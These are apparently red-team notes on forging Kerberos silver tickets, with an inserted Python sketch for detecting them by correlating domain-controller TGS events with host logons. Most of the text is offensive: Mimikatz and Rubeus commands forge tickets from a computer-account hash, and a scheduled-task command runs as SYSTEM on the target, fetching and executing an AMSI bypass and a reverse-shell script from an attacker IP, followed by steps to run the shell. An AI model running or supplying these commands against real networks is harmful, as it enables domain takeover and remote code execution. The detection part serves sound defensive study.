A silver ticket is a forged but valid TGS (service) ticket.
It is encrypted and signed with the NTLM hash of the service account (or computer account) under which the target service runs.
Services rarely validate the PAC (Privilege Attribute Certificate) with the DC.
The ticket grants access only to the targeted service itself (you get a TGS valid only for the indicated computer/service).
Reasonable persistence period (default of 30 days for computer accounts).
Attack starts at step 5 (AP_REQ):
We can create the TGS ourselves directly, since we have the hash of the service account/computer account.
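Because the forged TGS is built offline from the service account's key, the KDC never sees a TGS-REQ for it and logs no event 4769, while the target host still records a Kerberos network logon (event 4624). The following detection sketch, added here and not part of the original notes, correlates the two sources over constructed sample events; the field layout is simplified and the host/account names are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry), times in UTC.
# DC event 4769 (TGS issued): (time, requesting user, client IP, service account)
DC_4769 = [
    ("2024-05-01T10:00:05", "jdoe", "10.0.0.21", "FS01$"),
]
# Host event 4624 on FS01: (time, user, source IP, logon type, auth package)
HOST_4624 = [
    ("2024-05-01T10:00:07", "jdoe", "10.0.0.21", 3, "Kerberos"),
    ("2024-05-01T10:12:40", "Administrator", "10.0.0.99", 3, "Kerberos"),  # no 4769 preceded this
    ("2024-05-01T10:13:00", "svc_backup", "10.0.0.30", 3, "NTLM"),  # not Kerberos, out of scope
]


def find_unissued_kerberos_logons(host_account, host_logons, dc_tgs,
                                  window=timedelta(hours=10)):
    """Return Kerberos network logons on a host for which no DC issued a TGS.

    host_account is the computer account whose key signs tickets for the host
    (e.g. FS01$). A legitimate logon is preceded, within the service-ticket
    lifetime (10 h by default), by a 4769 for the same user and client IP
    naming that account. A silver ticket never produces such a 4769.
    """
    issued = [
        (datetime.fromisoformat(t), user.lower(), ip)
        for t, user, ip, svc in dc_tgs
        if svc.lower() == host_account.lower()
    ]
    suspicious = []
    for t, user, ip, logon_type, package in host_logons:
        if package != "Kerberos" or logon_type != 3:
            continue  # only Kerberos network logons can carry a forged TGS
        when = datetime.fromisoformat(t)
        matched = any(
            u == user.lower() and i == ip and when - window <= issued_at <= when
            for issued_at, u, i in issued
        )
        if not matched:
            suspicious.append((t, user, ip))
    return suspicious


if __name__ == "__main__":
    for hit in find_unissued_kerberos_logons("FS01$", HOST_4624, DC_4769):
        print("possible silver ticket:", hit)
```

The correlation only holds if 4769 events from every DC in the domain are collected, since the client may have requested its ticket from any of them.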
Using the hash of the Domain Controller's computer account, the command below provides access to shares on the Domain Controller:
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain sid> /target:<FQDN computer target> /service:<serviceclass> /rc4:<hash of computer$> /user:Administrator /ptt"'
.\RubeusNew.exe silver /service:"<serviceclass>/<FQDN computer target>" /rc4:"<hash of computer$>" /user:"administrator" /domain:"<domain>" /sid:"<domain sid>" /ptt
Create a silver ticket for the HOST SPN, which will allow us to schedule a task on the target (we also need an HTTP SPN ticket to use PowerShell Remoting):
Invoke-Mimikatz -Command '"kerberos::golden /domain:<domain> /sid:<domain sid> /target:<FQDN computer target> /service:<serviceclass> /rc4:<hash of computer$> /user:Administrator /ptt"'
Schedule the task (works without disabling Defender):
schtasks /create /S <FQDN computer target> /SC Weekly /RU "NT Authority\SYSTEM" /TN "TaskName" /TR "powershell.exe -c 'iex(iwr -UseBasicParsing <http://ip.of.attacker.machine>:port/amsibypass.txt); iex(iwr -UseBasicParsing <http://ip.of.attacker.machine>:port/Invoke-PowerShellTcpEx.ps1)'"
Modify Invoke-PowerShellTcpEx.ps1 with your IP/port:
Run the reverse shell: